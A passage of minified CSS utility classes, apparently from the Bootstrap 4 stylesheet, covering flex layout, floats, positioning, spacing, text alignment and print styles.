(min-width:1200px){.flex-xl-row{flex-direction:row!important}.flex-xl-column{flex-direction:column!important}.flex-xl-row-reverse{flex-direction:row-reverse!important}.flex-xl-column-reverse{flex-direction:column-reverse!important}.flex-xl-wrap{flex-wrap:wrap!important}.flex-xl-nowrap{flex-wrap:nowrap!important}.flex-xl-wrap-reverse{flex-wrap:wrap-reverse!important}.flex-xl-fill{flex:1 1 auto!important}.flex-xl-grow-0{flex-grow:0!important}.flex-xl-grow-1{flex-grow:1!important}.flex-xl-shrink-0{flex-shrink:0!important}.flex-xl-shrink-1{flex-shrink:1!important}.justify-content-xl-start{justify-content:flex-start!important}.justify-content-xl-end{justify-content:flex-end!important}.justify-content-xl-center{justify-content:center!important}.justify-content-xl-between{justify-content:space-between!important}.justify-content-xl-around{justify-content:space-around!important}.align-items-xl-start{align-items:flex-start!important}.align-items-xl-end{align-items:flex-end!important}.align-items-xl-center{align-items:center!important}.align-items-xl-baseline{align-items:baseline!important}.align-items-xl-stretch{align-items:stretch!important}.align-content-xl-start{align-content:flex-start!important}.align-content-xl-end{align-content:flex-end!important}.align-content-xl-center{align-content:center!important}.align-content-xl-between{align-content:space-between!important}.align-content-xl-around{align-content:space-around!important}.align-content-xl-stretch{align-content:stretch!important}.align-self-xl-auto{align-self:auto!important}.align-self-xl-start{align-self:flex-start!important}.align-self-xl-end{align-self:flex-end!important}.align-self-xl-center{align-self:center!important}.align-self-xl-baseline{align-self:baseline!important}.align-self-xl-stretch{align-self:stretch!important}}.float-left{float:left!important}.float-right{float:right!important}.float-none{float:none!important}@media (min-width:576px){.float-sm-left{float:left!important}.float-sm-right{float:right!important}.float-sm-none{float:none!important}}@media (min-width:768px){.float-md-left{float:left!important}.float-md-right{float:right!important}.float-md-none{float:none!important}}@media (min-width:992px){.float-lg-left{float:left!important}.float-lg-right{float:right!important}.float-lg-none{float:none!important}}@media (min-width:1200px){.float-xl-left{float:left!important}.float-xl-right{float:right!important}.float-xl-none{float:none!important}}.user-select-all{user-select:all!important}.user-select-auto{user-select:auto!important}.user-select-none{user-select:none!important}.overflow-auto{overflow:auto!important}.overflow-hidden{overflow:hidden!important}.position-static{position:static!important}.position-relative{position:relative!important}.position-absolute{position:absolute!important}.position-fixed{position:fixed!important}.position-sticky{position:sticky!important}.fixed-top{position:fixed;top:0;right:0;left:0;z-index:1030}.fixed-bottom{position:fixed;right:0;bottom:0;left:0;z-index:1030}@supports (position:sticky){.sticky-top{position:sticky;top:0;z-index:1020}}.sr-only{position:absolute;width:1px;height:1px;padding:0;margin:-1px;overflow:hidden;clip:rect(0,0,0,0);white-space:nowrap;border:0}.sr-only-focusable:active,.sr-only-focusable:focus{position:static;width:auto;height:auto;overflow:visible;clip:auto;white-space:normal}.shadow-sm{box-shadow:0 .125rem .25rem rgba(0,0,0,.075)!important}.shadow{box-shadow:0 .5rem 1rem rgba(0,0,0,.15)!important}.shadow-lg{box-shadow:0 1rem 3rem rgba(0,0,0,.175)!important}.shadow-none{box-shadow:none!important}.w-25{width:25%!important}.w-50{width:50%!important}.w-75{width:75%!important}.w-100{width:100%!important}.w-auto{width:auto!important}.h-25{height:25%!important}.h-50{height:50%!important}.h-75{height:75%!important}.h-100{height:100%!important}.h-auto{height:auto!important}.mw-100{max-width:100%!important}.mh-100{max-height:100%!important}.min-vw-100{min-width:100vw!important}.min-vh-100{min-height:100vh!important}.vw-100{width:100vw!important}.vh-100{height:100vh!important}.m-0{margin:0!important}.mt-0,.my-0{margin-top:0!important}.mr-0,.mx-0{margin-right:0!important}.mb-0,.my-0{margin-bottom:0!important}.ml-0,.mx-0{margin-left:0!important}.m-1{margin:.25rem!important}.mt-1,.my-1{margin-top:.25rem!important}.mr-1,.mx-1{margin-right:.25rem!important}.mb-1,.my-1{margin-bottom:.25rem!important}.ml-1,.mx-1{margin-left:.25rem!important}.m-2{margin:.5rem!important}.mt-2,.my-2{margin-top:.5rem!important}.mr-2,.mx-2{margin-right:.5rem!important}.mb-2,.my-2{margin-bottom:.5rem!important}.ml-2,.mx-2{margin-left:.5rem!important}.m-3{margin:1rem!important}.mt-3,.my-3{margin-top:1rem!important}.mr-3,.mx-3{margin-right:1rem!important}.mb-3,.my-3{margin-bottom:1rem!important}.ml-3,.mx-3{margin-left:1rem!important}.m-4{margin:1.5rem!important}.mt-4,.my-4{margin-top:1.5rem!important}.mr-4,.mx-4{margin-right:1.5rem!important}.mb-4,.my-4{margin-bottom:1.5rem!important}.ml-4,.mx-4{margin-left:1.5rem!important}.m-5{margin:3rem!important}.mt-5,.my-5{margin-top:3rem!important}.mr-5,.mx-5{margin-right:3rem!important}.mb-5,.my-5{margin-bottom:3rem!important}.ml-5,.mx-5{margin-left:3rem!important}.p-0{padding:0!important}.pt-0,.py-0{padding-top:0!important}.pr-0,.px-0{padding-right:0!important}.pb-0,.py-0{padding-bottom:0!important}.pl-0,.px-0{padding-left:0!important}.p-1{padding:.25rem!important}.pt-1,.py-1{padding-top:.25rem!important}.pr-1,.px-1{padding-right:.25rem!important}.pb-1,.py-1{padding-bottom:.25rem!important}.pl-1,.px-1{padding-left:.25rem!important}.p-2{padding:.5rem!important}.pt-2,.py-2{padding-top:.5rem!important}.pr-2,.px-2{padding-right:.5rem!important}.pb-2,.py-2{padding-bottom:.5rem!important}.pl-2,.px-2{padding-left:.5rem!important}.p-3{padding:1rem!important}.pt-3,.py-3{padding-top:1rem!important}.pr-3,.px-3{padding-right:1rem!important}.pb-3,.py-3{padding-bottom:1rem!important}.pl-3,.px-3{padding-left:1rem!important}.p-4{padding:1.5rem!important}.pt-4,.py-4{padding-top:1.5rem!important}.pr-4,.px-4{padding-right:1.5rem!important}.pb-4,.py-4{padding-bottom:1.5rem!important}.pl-4,.px-4{padding-left:1.5rem!important}.p-5{padding:3rem!important}.pt-5,.py-5{padding-top:3rem!important}.pr-5,.px-5{padding-right:3rem!important}.pb-5,.py-5{padding-bottom:3rem!important}.pl-5,.px-5{padding-left:3rem!important}.m-n1{margin:-.25rem!important}.mt-n1,.my-n1{margin-top:-.25rem!important}.mr-n1,.mx-n1{margin-right:-.25rem!important}.mb-n1,.my-n1{margin-bottom:-.25rem!important}.ml-n1,.mx-n1{margin-left:-.25rem!important}.m-n2{margin:-.5rem!important}.mt-n2,.my-n2{margin-top:-.5rem!important}.mr-n2,.mx-n2{margin-right:-.5rem!important}.mb-n2,.my-n2{margin-bottom:-.5rem!important}.ml-n2,.mx-n2{margin-left:-.5rem!important}.m-n3{margin:-1rem!important}.mt-n3,.my-n3{margin-top:-1rem!important}.mr-n3,.mx-n3{margin-right:-1rem!important}.mb-n3,.my-n3{margin-bottom:-1rem!important}.ml-n3,.mx-n3{margin-left:-1rem!important}.m-n4{margin:-1.5rem!important}.mt-n4,.my-n4{margin-top:-1.5rem!important}.mr-n4,.mx-n4{margin-right:-1.5rem!important}.mb-n4,.my-n4{margin-bottom:-1.5rem!important}.ml-n4,.mx-n4{margin-left:-1.5rem!important}.m-n5{margin:-3rem!important}.mt-n5,.my-n5{margin-top:-3rem!important}.mr-n5,.mx-n5{margin-right:-3rem!important}.mb-n5,.my-n5{margin-bottom:-3rem!important}.ml-n5,.mx-n5{margin-left:-3rem!important}.m-auto{margin:auto!important}.mt-auto,.my-auto{margin-top:auto!important}.mr-auto,.mx-auto{margin-right:auto!important}.mb-auto,.my-auto{margin-bottom:auto!important}.ml-auto,.mx-auto{margin-left:auto!important}@media (min-width:576px){.m-sm-0{margin:0!important}.mt-sm-0,.my-sm-0{margin-top:0!important}.mr-sm-0,.mx-sm-0{margin-right:0!important}.mb-sm-0,.my-sm-0{margin-bottom:0!important}.ml-sm-0,.mx-sm-0{margin-left:0!important}.m-sm-1{margin:.25rem!important}.mt-sm-1,.my-sm-1{margin-top:.25rem!important}.mr-sm-1,.mx-sm-1{margin-right:.25rem!important}.mb-sm-1,.my-sm-1{margin-bottom:.25rem!important}.ml-sm-1,.mx-sm-1{margin-left:.25rem!important}.m-sm-2{margin:.5rem!important}.mt-sm-2,.my-sm-2{margin-top:.5rem!important}.mr-sm-2,.mx-sm-2{margin-right:.5rem!important}.mb-sm-2,.my-sm-2{margin-bottom:.5rem!important}.ml-sm-2,.mx-sm-2{margin-left:.5rem!important}.m-sm-3{margin:1rem!important}.mt-sm-3,.my-sm-3{margin-top:1rem!important}.mr-sm-3,.mx-sm-3{margin-right:1rem!important}.mb-sm-3,.my-sm-3{margin-bottom:1rem!important}.ml-sm-3,.mx-sm-3{margin-left:1rem!important}.m-sm-4{margin:1.5rem!important}.mt-sm-4,.my-sm-4{margin-top:1.5rem!important}.mr-sm-4,.mx-sm-4{margin-right:1.5rem!important}.mb-sm-4,.my-sm-4{margin-bottom:1.5rem!important}.ml-sm-4,.mx-sm-4{margin-left:1.5rem!important}.m-sm-5{margin:3rem!important}.mt-sm-5,.my-sm-5{margin-top:3rem!important}.mr-sm-5,.mx-sm-5{margin-right:3rem!important}.mb-sm-5,.my-sm-5{margin-bottom:3rem!important}.ml-sm-5,.mx-sm-5{margin-left:3rem!important}.p-sm-0{padding:0!important}.pt-sm-0,.py-sm-0{padding-top:0!important}.pr-sm-0,.px-sm-0{padding-right:0!important}.pb-sm-0,.py-sm-0{padding-bottom:0!important}.pl-sm-0,.px-sm-0{padding-left:0!important}.p-sm-1{padding:.25rem!important}.pt-sm-1,.py-sm-1{padding-top:.25rem!important}.pr-sm-1,.px-sm-1{padding-right:.25rem!important}.pb-sm-1,.py-sm-1{padding-bottom:.25rem!important}.pl-sm-1,.px-sm-1{padding-left:.25rem!important}.p-sm-2{padding:.5rem!important}.pt-sm-2,.py-sm-2{padding-top:.5rem!important}.pr-sm-2,.px-sm-2{padding-right:.5rem!important}.pb-sm-2,.py-sm-2{padding-bottom:.5rem!important}.pl-sm-2,.px-sm-2{padding-left:.5rem!important}.p-sm-3{padding:1rem!important}.pt-sm-3,.py-sm-3{padding-top:1rem!important}.pr-sm-3,.px-sm-3{padding-right:1rem!important}.pb-sm-3,.py-sm-3{padding-bottom:1rem!important}.pl-sm-3,.px-sm-3{padding-left:1rem!important}.p-sm-4{padding:1.5rem!important}.pt-sm-4,.py-sm-4{padding-top:1.5rem!important}.pr-sm-4,.px-sm-4{padding-right:1.5rem!important}.pb-sm-4,.py-sm-4{padding-bottom:1.5rem!important}.pl-sm-4,.px-sm-4{padding-left:1.5rem!important}.p-sm-5{padding:3rem!important}.pt-sm-5,.py-sm-5{padding-top:3rem!important}.pr-sm-5,.px-sm-5{padding-right:3rem!important}.pb-sm-5,.py-sm-5{padding-bottom:3rem!important}.pl-sm-5,.px-sm-5{padding-left:3rem!important}.m-sm-n1{margin:-.25rem!important}.mt-sm-n1,.my-sm-n1{margin-top:-.25rem!important}.mr-sm-n1,.mx-sm-n1{margin-right:-.25rem!important}.mb-sm-n1,.my-sm-n1{margin-bottom:-.25rem!important}.ml-sm-n1,.mx-sm-n1{margin-left:-.25rem!important}.m-sm-n2{margin:-.5rem!important}.mt-sm-n2,.my-sm-n2{margin-top:-.5rem!important}.mr-sm-n2,.mx-sm-n2{margin-right:-.5rem!important}.mb-sm-n2,.my-sm-n2{margin-bottom:-.5rem!important}.ml-sm-n2,.mx-sm-n2{margin-left:-.5rem!important}.m-sm-n3{margin:-1rem!important}.mt-sm-n3,.my-sm-n3{margin-top:-1rem!important}.mr-sm-n3,.mx-sm-n3{margin-right:-1rem!important}.mb-sm-n3,.my-sm-n3{margin-bottom:-1rem!important}.ml-sm-n3,.mx-sm-n3{margin-left:-1rem!important}.m-sm-n4{margin:-1.5rem!important}.mt-sm-n4,.my-sm-n4{margin-top:-1.5rem!important}.mr-sm-n4,.mx-sm-n4{margin-right:-1.5rem!important}.mb-sm-n4,.my-sm-n4{margin-bottom:-1.5rem!important}.ml-sm-n4,.mx-sm-n4{margin-left:-1.5rem!important}.m-sm-n5{margin:-3rem!important}.mt-sm-n5,.my-sm-n5{margin-top:-3rem!important}.mr-sm-n5,.mx-sm-n5{margin-right:-3rem!important}.mb-sm-n5,.my-sm-n5{margin-bottom:-3rem!important}.ml-sm-n5,.mx-sm-n5{margin-left:-3rem!important}.m-sm-auto{margin:auto!important}.mt-sm-auto,.my-sm-auto{margin-top:auto!important}.mr-sm-auto,.mx-sm-auto{margin-right:auto!important}.mb-sm-auto,.my-sm-auto{margin-bottom:auto!important}.ml-sm-auto,.mx-sm-auto{margin-left:auto!important}}@media (min-width:768px){.m-md-0{margin:0!important}.mt-md-0,.my-md-0{margin-top:0!important}.mr-md-0,.mx-md-0{margin-right:0!important}.mb-md-0,.my-md-0{margin-bottom:0!important}.ml-md-0,.mx-md-0{margin-left:0!important}.m-md-1{margin:.25rem!important}.mt-md-1,.my-md-1{margin-top:.25rem!important}.mr-md-1,.mx-md-1{margin-right:.25rem!important}.mb-md-1,.my-md-1{margin-bottom:.25rem!important}.ml-md-1,.mx-md-1{margin-left:.25rem!important}.m-md-2{margin:.5rem!important}.mt-md-2,.my-md-2{margin-top:.5rem!important}.mr-md-2,.mx-md-2{margin-right:.5rem!important}.mb-md-2,.my-md-2{margin-bottom:.5rem!important}.ml-md-2,.mx-md-2{margin-left:.5rem!important}.m-md-3{margin:1rem!important}.mt-md-3,.my-md-3{margin-top:1rem!important}.mr-md-3,.mx-md-3{margin-right:1rem!important}.mb-md-3,.my-md-3{margin-bottom:1rem!important}.ml-md-3,.mx-md-3{margin-left:1rem!important}.m-md-4{margin:1.5rem!important}.mt-md-4,.my-md-4{margin-top:1.5rem!important}.mr-md-4,.mx-md-4{margin-right:1.5rem!important}.mb-md-4,.my-md-4{margin-bottom:1.5rem!important}.ml-md-4,.mx-md-4{margin-left:1.5rem!important}.m-md-5{margin:3rem!important}.mt-md-5,.my-md-5{margin-top:3rem!important}.mr-md-5,.mx-md-5{margin-right:3rem!important}.mb-md-5,.my-md-5{margin-bottom:3rem!important}.ml-md-5,.mx-md-5{margin-left:3rem!important}.p-md-0{padding:0!important}.pt-md-0,.py-md-0{padding-top:0!important}.pr-md-0,.px-md-0{padding-right:0!important}.pb-md-0,.py-md-0{padding-bottom:0!important}.pl-md-0,.px-md-0{padding-left:0!important}.p-md-1{padding:.25rem!important}.pt-md-1,.py-md-1{padding-top:.25rem!important}.pr-md-1,.px-md-1{padding-right:.25rem!important}.pb-md-1,.py-md-1{padding-bottom:.25rem!important}.pl-md-1,.px-md-1{padding-left:.25rem!important}.p-md-2{padding:.5rem!important}.pt-md-2,.py-md-2{padding-top:.5rem!important}.pr-md-2,.px-md-2{padding-right:.5rem!important}.pb-md-2,.py-md-2{padding-bottom:.5rem!important}.pl-md-2,.px-md-2{padding-left:.5rem!important}.p-md-3{padding:1rem!important}.pt-md-3,.py-md-3{padding-top:1rem!important}.pr-md-3,.px-md-3{padding-right:1rem!important}.pb-md-3,.py-md-3{padding-bottom:1rem!important}.pl-md-3,.px-md-3{padding-left:1rem!important}.p-md-4{padding:1.5rem!important}.pt-md-4,.py-md-4{padding-top:1.5rem!important}.pr-md-4,.px-md-4{padding-right:1.5rem!important}.pb-md-4,.py-md-4{padding-bottom:1.5rem!important}.pl-md-4,.px-md-4{padding-left:1.5rem!important}.p-md-5{padding:3rem!important}.pt-md-5,.py-md-5{padding-top:3rem!important}.pr-md-5,.px-md-5{padding-right:3rem!important}.pb-md-5,.py-md-5{padding-bottom:3rem!important}.pl-md-5,.px-md-5{padding-left:3rem!important}.m-md-n1{margin:-.25rem!important}.mt-md-n1,.my-md-n1{margin-top:-.25rem!important}.mr-md-n1,.mx-md-n1{margin-right:-.25rem!important}.mb-md-n1,.my-md-n1{margin-bottom:-.25rem!important}.ml-md-n1,.mx-md-n1{margin-left:-.25rem!important}.m-md-n2{margin:-.5rem!important}.mt-md-n2,.my-md-n2{margin-top:-.5rem!important}.mr-md-n2,.mx-md-n2{margin-right:-.5rem!important}.mb-md-n2,.my-md-n2{margin-bottom:-.5rem!important}.ml-md-n2,.mx-md-n2{margin-left:-.5rem!important}.m-md-n3{margin:-1rem!important}.mt-md-n3,.my-md-n3{margin-top:-1rem!important}.mr-md-n3,.mx-md-n3{margin-right:-1rem!important}.mb-md-n3,.my-md-n3{margin-bottom:-1rem!important}.ml-md-n3,.mx-md-n3{margin-left:-1rem!important}.m-md-n4{margin:-1.5rem!important}.mt-md-n4,.my-md-n4{margin-top:-1.5rem!important}.mr-md-n4,.mx-md-n4{margin-right:-1.5rem!important}.mb-md-n4,.my-md-n4{margin-bottom:-1.5rem!important}.ml-md-n4,.mx-md-n4{margin-left:-1.5rem!important}.m-md-n5{margin:-3rem!important}.mt-md-n5,.my-md-n5{margin-top:-3rem!important}.mr-md-n5,.mx-md-n5{margin-right:-3rem!important}.mb-md-n5,.my-md-n5{margin-bottom:-3rem!important}.ml-md-n5,.mx-md-n5{margin-left:-3rem!important}.m-md-auto{margin:auto!important}.mt-md-auto,.my-md-auto{margin-top:auto!important}.mr-md-auto,.mx-md-auto{margin-right:auto!important}.mb-md-auto,.my-md-auto{margin-bottom:auto!important}.ml-md-auto,.mx-md-auto{margin-left:auto!important}}@media (min-width:992px){.m-lg-0{margin:0!important}.mt-lg-0,.my-lg-0{margin-top:0!important}.mr-lg-0,.mx-lg-0{margin-right:0!important}.mb-lg-0,.my-lg-0{margin-bottom:0!important}.ml-lg-0,.mx-lg-0{margin-left:0!important}.m-lg-1{margin:.25rem!important}.mt-lg-1,.my-lg-1{margin-top:.25rem!important}.mr-lg-1,.mx-lg-1{margin-right:.25rem!important}.mb-lg-1,.my-lg-1{margin-bottom:.25rem!important}.ml-lg-1,.mx-lg-1{margin-left:.25rem!important}.m-lg-2{margin:.5rem!important}.mt-lg-2,.my-lg-2{margin-top:.5rem!important}.mr-lg-2,.mx-lg-2{margin-right:.5rem!important}.mb-lg-2,.my-lg-2{margin-bottom:.5rem!important}.ml-lg-2,.mx-lg-2{margin-left:.5rem!important}.m-lg-3{margin:1rem!important}.mt-lg-3,.my-lg-3{margin-top:1rem!important}.mr-lg-3,.mx-lg-3{margin-right:1rem!important}.mb-lg-3,.my-lg-3{margin-bottom:1rem!important}.ml-lg-3,.mx-lg-3{margin-left:1rem!important}.m-lg-4{margin:1.5rem!important}.mt-lg-4,.my-lg-4{margin-top:1.5rem!important}.mr-lg-4,.mx-lg-4{margin-right:1.5rem!important}.mb-lg-4,.my-lg-4{margin-bottom:1.5rem!important}.ml-lg-4,.mx-lg-4{margin-left:1.5rem!important}.m-lg-5{margin:3rem!important}.mt-lg-5,.my-lg-5{margin-top:3rem!important}.mr-lg-5,.mx-lg-5{margin-right:3rem!important}.mb-lg-5,.my-lg-5{margin-bottom:3rem!important}.ml-lg-5,.mx-lg-5{margin-left:3rem!important}.p-lg-0{padding:0!important}.pt-lg-0,.py-lg-0{padding-top:0!important}.pr-lg-0,.px-lg-0{padding-right:0!important}.pb-lg-0,.py-lg-0{padding-bottom:0!important}.pl-lg-0,.px-lg-0{padding-left:0!important}.p-lg-1{padding:.25rem!important}.pt-lg-1,.py-lg-1{padding-top:.25rem!important}.pr-lg-1,.px-lg-1{padding-right:.25rem!important}.pb-lg-1,.py-lg-1{padding-bottom:.25rem!important}.pl-lg-1,.px-lg-1{padding-left:.25rem!important}.p-lg-2{padding:.5rem!important}.pt-lg-2,.py-lg-2{padding-top:.5rem!important}.pr-lg-2,.px-lg-2{padding-right:.5rem!important}.pb-lg-2,.py-lg-2{padding-bottom:.5rem!important}.pl-lg-2,.px-lg-2{padding-left:.5rem!important}.p-lg-3{padding:1rem!important}.pt-lg-3,.py-lg-3{padding-top:1rem!important}.pr-lg-3,.px-lg-3{padding-right:1rem!important}.pb-lg-3,.py-lg-3{padding-bottom:1rem!important}.pl-lg-3,.px-lg-3{padding-left:1rem!important}.p-lg-4{padding:1.5rem!important}.pt-lg-4,.py-lg-4{padding-top:1.5rem!important}.pr-lg-4,.px-lg-4{padding-right:1.5rem!important}.pb-lg-4,.py-lg-4{padding-bottom:1.5rem!important}.pl-lg-4,.px-lg-4{padding-left:1.5rem!important}.p-lg-5{padding:3rem!important}.pt-lg-5,.py-lg-5{padding-top:3rem!important}.pr-lg-5,.px-lg-5{padding-right:3rem!important}.pb-lg-5,.py-lg-5{padding-bottom:3rem!important}.pl-lg-5,.px-lg-5{padding-left:3rem!important}.m-lg-n1{margin:-.25rem!important}.mt-lg-n1,.my-lg-n1{margin-top:-.25rem!important}.mr-lg-n1,.mx-lg-n1{margin-right:-.25rem!important}.mb-lg-n1,.my-lg-n1{margin-bottom:-.25rem!important}.ml-lg-n1,.mx-lg-n1{margin-left:-.25rem!important}.m-lg-n2{margin:-.5rem!important}.mt-lg-n2,.my-lg-n2{margin-top:-.5rem!important}.mr-lg-n2,.mx-lg-n2{margin-right:-.5rem!important}.mb-lg-n2,.my-lg-n2{margin-bottom:-.5rem!important}.ml-lg-n2,.mx-lg-n2{margin-left:-.5rem!important}.m-lg-n3{margin:-1rem!important}.mt-lg-n3,.my-lg-n3{margin-top:-1rem!important}.mr-lg-n3,.mx-lg-n3{margin-right:-1rem!important}.mb-lg-n3,.my-lg-n3{margin-bottom:-1rem!important}.ml-lg-n3,.mx-lg-n3{margin-left:-1rem!important}.m-lg-n4{margin:-1.5rem!important}.mt-lg-n4,.my-lg-n4{margin-top:-1.5rem!important}.mr-lg-n4,.mx-lg-n4{margin-right:-1.5rem!important}.mb-lg-n4,.my-lg-n4{margin-bottom:-1.5rem!important}.ml-lg-n4,.mx-lg-n4{margin-left:-1.5rem!important}.m-lg-n5{margin:-3rem!important}.mt-lg-n5,.my-lg-n5{margin-top:-3rem!important}.mr-lg-n5,.mx-lg-n5{margin-right:-3rem!important}.mb-lg-n5,.my-lg-n5{margin-bottom:-3rem!important}.ml-lg-n5,.mx-lg-n5{margin-left:-3rem!important}.m-lg-auto{margin:auto!important}.mt-lg-auto,.my-lg-auto{margin-top:auto!important}.mr-lg-auto,.mx-lg-auto{margin-right:auto!important}.mb-lg-auto,.my-lg-auto{margin-bottom:auto!important}.ml-lg-auto,.mx-lg-auto{margin-left:auto!important}}@media (min-width:1200px){.m-xl-0{margin:0!important}.mt-xl-0,.my-xl-0{margin-top:0!important}.mr-xl-0,.mx-xl-0{margin-right:0!important}.mb-xl-0,.my-xl-0{margin-bottom:0!important}.ml-xl-0,.mx-xl-0{margin-left:0!important}.m-xl-1{margin:.25rem!important}.mt-xl-1,.my-xl-1{margin-top:.25rem!important}.mr-xl-1,.mx-xl-1{margin-right:.25rem!important}.mb-xl-1,.my-xl-1{margin-bottom:.25rem!important}.ml-xl-1,.mx-xl-1{margin-left:.25rem!important}.m-xl-2{margin:.5rem!important}.mt-xl-2,.my-xl-2{margin-top:.5rem!important}.mr-xl-2,.mx-xl-2{margin-right:.5rem!important}.mb-xl-2,.my-xl-2{margin-bottom:.5rem!important}.ml-xl-2,.mx-xl-2{margin-left:.5rem!important}.m-xl-3{margin:1rem!important}.mt-xl-3,.my-xl-3{margin-top:1rem!important}.mr-xl-3,.mx-xl-3{margin-right:1rem!important}.mb-xl-3,.my-xl-3{margin-bottom:1rem!important}.ml-xl-3,.mx-xl-3{margin-left:1rem!important}.m-xl-4{margin:1.5rem!important}.mt-xl-4,.my-xl-4{margin-top:1.5rem!important}.mr-xl-4,.mx-xl-4{margin-right:1.5rem!important}.mb-xl-4,.my-xl-4{margin-bottom:1.5rem!important}.ml-xl-4,.mx-xl-4{margin-left:1.5rem!important}.m-xl-5{margin:3rem!important}.mt-xl-5,.my-xl-5{margin-top:3rem!important}.mr-xl-5,.mx-xl-5{margin-right:3rem!important}.mb-xl-5,.my-xl-5{margin-bottom:3rem!important}.ml-xl-5,.mx-xl-5{margin-left:3rem!important}.p-xl-0{padding:0!important}.pt-xl-0,.py-xl-0{padding-top:0!important}.pr-xl-0,.px-xl-0{padding-right:0!important}.pb-xl-0,.py-xl-0{padding-bottom:0!important}.pl-xl-0,.px-xl-0{padding-left:0!important}.p-xl-1{padding:.25rem!important}.pt-xl-1,.py-xl-1{padding-top:.25rem!important}.pr-xl-1,.px-xl-1{padding-right:.25rem!important}.pb-xl-1,.py-xl-1{padding-bottom:.25rem!important}.pl-xl-1,.px-xl-1{padding-left:.25rem!important}.p-xl-2{padding:.5rem!important}.pt-xl-2,.py-xl-2{padding-top:.5rem!important}.pr-xl-2,.px-xl-2{padding-right:.5rem!important}.pb-xl-2,.py-xl-2{padding-bottom:.5rem!important}.pl-xl-2,.px-xl-2{padding-left:.5rem!important}.p-xl-3{padding:1rem!important}.pt-xl-3,.py-xl-3{padding-top:1rem!important}.pr-xl-3,.px-xl-3{padding-right:1rem!important}.pb-xl-3,.py-xl-3{padding-bottom:1rem!important}.pl-xl-3,.px-xl-3{padding-left:1rem!important}.p-xl-4{padding:1.5rem!important}.pt-xl-4,.py-xl-4{padding-top:1.5rem!important}.pr-xl-4,.px-xl-4{padding-right:1.5rem!important}.pb-xl-4,.py-xl-4{padding-bottom:1.5rem!important}.pl-xl-4,.px-xl-4{padding-left:1.5rem!important}.p-xl-5{padding:3rem!important}.pt-xl-5,.py-xl-5{padding-top:3rem!important}.pr-xl-5,.px-xl-5{padding-right:3rem!important}.pb-xl-5,.py-xl-5{padding-bottom:3rem!important}.pl-xl-5,.px-xl-5{padding-left:3rem!important}.m-xl-n1{margin:-.25rem!important}.mt-xl-n1,.my-xl-n1{margin-top:-.25rem!important}.mr-xl-n1,.mx-xl-n1{margin-right:-.25rem!important}.mb-xl-n1,.my-xl-n1{margin-bottom:-.25rem!important}.ml-xl-n1,.mx-xl-n1{margin-left:-.25rem!important}.m-xl-n2{margin:-.5rem!important}.mt-xl-n2,.my-xl-n2{margin-top:-.5rem!important}.mr-xl-n2,.mx-xl-n2{margin-right:-.5rem!important}.mb-xl-n2,.my-xl-n2{margin-bottom:-.5rem!important}.ml-xl-n2,.mx-xl-n2{margin-left:-.5rem!important}.m-xl-n3{margin:-1rem!important}.mt-xl-n3,.my-xl-n3{margin-top:-1rem!important}.mr-xl-n3,.mx-xl-n3{margin-right:-1rem!important}.mb-xl-n3,.my-xl-n3{margin-bottom:-1rem!important}.ml-xl-n3,.mx-xl-n3{margin-left:-1rem!important}.m-xl-n4{margin:-1.5rem!important}.mt-xl-n4,.my-xl-n4{margin-top:-1.5rem!important}.mr-xl-n4,.mx-xl-n4{margin-right:-1.5rem!important}.mb-xl-n4,.my-xl-n4{margin-bottom:-1.5rem!important}.ml-xl-n4,.mx-xl-n4{margin-left:-1.5rem!important}.m-xl-n5{margin:-3rem!important}.mt-xl-n5,.my-xl-n5{margin-top:-3rem!important}.mr-xl-n5,.mx-xl-n5{margin-right:-3rem!important}.mb-xl-n5,.my-xl-n5{margin-bottom:-3rem!important}.ml-xl-n5,.mx-xl-n5{margin-left:-3rem!important}.m-xl-auto{margin:auto!important}.mt-xl-auto,.my-xl-auto{margin-top:auto!important}.mr-xl-auto,.mx-xl-auto{margin-right:auto!important}.mb-xl-auto,.my-xl-auto{margin-bottom:auto!important}.ml-xl-auto,.mx-xl-auto{margin-left:auto!important}}.stretched-link::after{position:absolute;top:0;right:0;bottom:0;left:0;z-index:1;pointer-events:auto;content:"";background-color:rgba(0,0,0,0)}.text-monospace{font-family:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace!important}.text-justify{text-align:justify!important}.text-wrap{white-space:normal!important}.text-nowrap{white-space:nowrap!important}.text-truncate{overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.text-left{text-align:left!important}.text-right{text-align:right!important}.text-center{text-align:center!important}@media (min-width:576px){.text-sm-left{text-align:left!important}.text-sm-right{text-align:right!important}.text-sm-center{text-align:center!important}}@media (min-width:768px){.text-md-left{text-align:left!important}.text-md-right{text-align:right!important}.text-md-center{text-align:center!important}}@media (min-width:992px){.text-lg-left{text-align:left!important}.text-lg-right{text-align:right!important}.text-lg-center{text-align:center!important}}@media (min-width:1200px){.text-xl-left{text-align:left!important}.text-xl-right{text-align:right!important}.text-xl-center{text-align:center!important}}.text-lowercase{text-transform:lowercase!important}.text-uppercase{text-transform:uppercase!important}.text-capitalize{text-transform:capitalize!important}.font-weight-light{font-weight:300!important}.font-weight-lighter{font-weight:lighter!important}.font-weight-normal{font-weight:400!important}.font-weight-bold{font-weight:700!important}.font-weight-bolder{font-weight:bolder!important}.font-italic{font-style:italic!important}.text-white{color:#fff!important}.text-primary{color:#007bff!important}a.text-primary:focus,a.text-primary:hover{color:#0056b3!important}.text-secondary{color:#6c757d!important}a.text-secondary:focus,a.text-secondary:hover{color:#494f54!important}.text-success{color:#28a745!important}a.text-success:focus,a.text-success:hover{color:#19692c!important}.text-info{color:#17a2b8!important}a.text-info:focus,a.text-info:hover{color:#0f6674!important}.text-warning{color:#ffc107!important}a.text-warning:focus,a.text-warning:hover{color:#ba8b00!important}.text-danger{color:#dc3545!important}a.text-danger:focus,a.text-danger:hover{color:#a71d2a!important}.text-light{color:#f8f9fa!important}a.text-light:focus,a.text-light:hover{color:#cbd3da!important}.text-dark{color:#343a40!important}a.text-dark:focus,a.text-dark:hover{color:#121416!important}.text-body{color:#212529!important}.text-muted{color:#6c757d!important}.text-black-50{color:rgba(0,0,0,.5)!important}.text-white-50{color:rgba(255,255,255,.5)!important}.text-hide{font:0/0 a;color:transparent;text-shadow:none;background-color:transparent;border:0}.text-decoration-none{text-decoration:none!important}.text-break{word-break:break-word!important;word-wrap:break-word!important}.text-reset{color:inherit!important}.visible{visibility:visible!important}.invisible{visibility:hidden!important}@media print{*,::after,::before{text-shadow:none!important;box-shadow:none!important}a:not(.btn){text-decoration:underline}abbr[title]::after{content:" (" attr(title) ")"}pre{white-space:pre-wrap!important}blockquote,pre{border:1px solid 